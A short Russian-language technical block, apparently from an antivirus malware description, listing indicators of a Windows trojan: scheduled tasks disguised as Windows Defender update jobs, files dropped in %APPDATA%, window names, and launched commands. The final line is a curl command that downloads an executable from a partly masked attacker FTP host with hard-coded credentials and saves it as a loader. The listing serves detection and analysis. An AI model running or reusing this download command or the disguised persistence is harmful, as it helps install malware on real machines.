Техническая информация
- %WINDIR%\Tasks\Windows Defender Daily Update.job
- %WINDIR%\Tasks\Windows Defender Daily Checking.job
- %APPDATA%\Kernel.dll
- %APPDATA%\asf.exe
- %APPDATA%\autorun.exe
- %APPDATA%\curl.exe
- 'su####tmachine.ru':21
- DNS ASK su####tmachine.ru
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'STATIC' WindowName: 'q3TDgcZ4p2up0Z77amQP 00000BF0'
- '%APPDATA%\Kernel.dll' -s -p951753
- '%APPDATA%\autorun.exe'
- '%APPDATA%\asf.exe'
- '%APPDATA%\curl.exe' ftp://su####tmachine.ru/launcher_DOWNLOAD.exe --user ivanbonv_83ergsufx:qwerty12345 --output "%APPDATA%\loader.exe"